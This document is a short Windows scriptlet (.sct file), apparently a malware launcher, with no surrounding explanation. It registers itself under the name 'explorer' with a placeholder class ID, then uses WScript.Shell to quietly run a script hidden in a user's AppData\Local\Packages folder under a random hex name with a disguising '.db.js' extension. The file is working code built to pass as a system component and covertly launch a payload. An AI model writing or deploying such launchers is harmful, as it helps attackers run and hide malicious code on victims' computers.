<?xml version="1.0"?>
<scriptlet>
    <registration
        description="explorer"
        progid="explorer"
        version="1.0"
        classid="{66666666-6666-6666-6666-666666666666}"
        remotable="true">
    </registration>
    <script language="JScript">
        <![CDATA[
            var WShell = new ActiveXObject("WScript.Shell");
            WShell.Run("C:\\users\\peyton.blake\\AppData\\Local\\Packages\\c8e2c4594f81445d8a767b662f9937b1.db.js");
        ]]>

    </script>
</scriptlet>
